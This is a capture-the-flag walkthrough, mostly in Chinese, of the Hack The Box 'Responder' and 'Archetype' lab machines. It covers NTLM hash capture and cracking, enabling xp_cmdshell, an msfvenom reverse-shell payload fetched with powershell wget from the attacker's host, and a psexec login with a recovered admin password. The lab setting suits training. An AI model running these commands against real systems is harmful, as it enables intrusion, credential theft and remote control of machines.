HTB Starting Point (Windows)

,

Responder

target IP 換過

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ rustscan -a 10.129.80.176   --ulimit 5000
...
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
5985/tcp open  wsman   syn-ack ttl 127 # WinRM

└─$ nmap 10.129.80.176  -p 80,5985 -sC -sV
...
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

瀏覽器開 10.129.80.176:80
image
猜因為是 Name-Based Virtual hosting,後端會檢查 HOST header

1
2
3
4
5
6
7
8
9
10
11
12
└─$ echo "10.129.80.176 unika.htb" | sudo tee -a /etc/hosts
```                                             
![image](https://hackmd.io/_uploads/SyoQCKMxxx.png)
### LFI
![image](https://hackmd.io/_uploads/SJ6NRYMele.png)
改變語言
![image](https://hackmd.io/_uploads/Sk9HCYGexe.png)
![image](https://hackmd.io/_uploads/Hy2LRFzele.png)
![image](https://hackmd.io/_uploads/rkDcCFMlgx.png)
### RFI、responder capture NTMLv2hash
可LFI,嘗試用RFI觸發NTLM驗證
用  responder 捕捉  NTLM hash

└─$ sudo responder -I tun0

1
2
3
4
5
6
7
8
![image](https://hackmd.io/_uploads/rks-yqzglx.png)
![image](https://hackmd.io/_uploads/rJZ719zgel.png)
```bash
└─$ echo "Administrator::RESPONDER:4a95d07b969fd046:A53ADF8373CE1A31E960396F36847991:0101000000000000001032844D4BDB01C3F930F5F8FEF00E00000000020008003300550057004A0001001E00570049004E002D005200430058005200380046003600360031005600410004003400570049004E002D00520043005800520038004600360036003100560041002E003300550057004A002E004C004F00430041004C00030014003300550057004A002E004C004F00430041004C00050014003300550057004A002E004C004F00430041004C0007000800001032844D4BDB0106000400020000000800300030000000000000000100000000200000CE56F35E8FA2A58E4B4D985DE92E914919906A167F49C57248EE7F00607763B90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00360031000000000000000000" > hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
...
badminton        (Administrator) 
...

WinRM

1
2
└─$ evil-winrm -i 10.129.134.106 -u Administrator -p badminton
*Evil-WinRM* PS C:\Users\Administrator\Documents>

經過尋找
image
image

Archetype

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
└─$ rustscan -a 10.129.128.154 --ulimit 5000
PORT     STATE SERVICE      REASON
135/tcp  open  msrpc        syn-ack ttl 127
139/tcp  open  netbios-ssn  syn-ack ttl 127
445/tcp  open  microsoft-ds syn-ack ttl 127
1433/tcp open  ms-sql-s     syn-ack ttl 127
5985/tcp open  wsman        syn-ack ttl 127

└─$ nmap 10.129.128.154 -p 135,139,445,1433,5985 -sC -sV
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   10.129.128.154:1433: 
|     Target_Name: ARCHETYPE
|     NetBIOS_Domain_Name: ARCHETYPE
|     NetBIOS_Computer_Name: ARCHETYPE
|     DNS_Domain_Name: Archetype
|     DNS_Computer_Name: Archetype
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.129.128.154:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-12-11T06:16:46
|_Not valid after:  2054-12-11T06:16:46
|_ssl-date: 2024-12-11T06:28:15+00:00; +1s from scanner time.
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-12-10T22:27:59-08:00
|_clock-skew: mean: 1h36m01s, deviation: 3h34m41s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-12-11T06:27:57
|_  start_date: N/A

image
image
取得SQL server帳密
image

Foothold

check what is the role we have in the server

1
2
3
4
SQL (ARCHETYPE\sql_svc  dbo@master)> SELECT is_srvrolemember('sysadmin');
    
-   
1

確認xp_cmdshell是否啟用

1
2
SQL (ARCHETYPE\sql_svc  dbo@master)> EXEC xp_cmdshell 'net user';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

啟用xp_cmdshell

1
2
3
4
5
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; - Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

製作reverse shell

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.52  LPORT=443 -f exe -o reverse.exe

沒有權限在當前目錄上傳檔案
image
試試看sql_svc的家目錄

1
2
3
4
SQL (ARCHETYPE\sql_svc  dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.14.52:8000/reverse.exe -outfile reverse.exe"
output   
------   
NULL

image

1
2
3
4
SQL (ARCHETYPE\sql_svc  dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;.\reverse.exe"
output   
------   
NULL

image
取得 user flag
image

Privilege Escalation

用winPEAS腳本枚舉

1
2
C:\Users\sql_svc\Downloads>powershell -c wget http://10.10.14.52:8000/winPEASx64.exe -outfile winPEASx64.exe
C:\Users\sql_svc\Downloads>.\winPEASx64.exe

image
image

1
2
$ psexec.py administrator@10.129.157.196
Password:MEGACORP_4dm1n!!

取得 root flag
image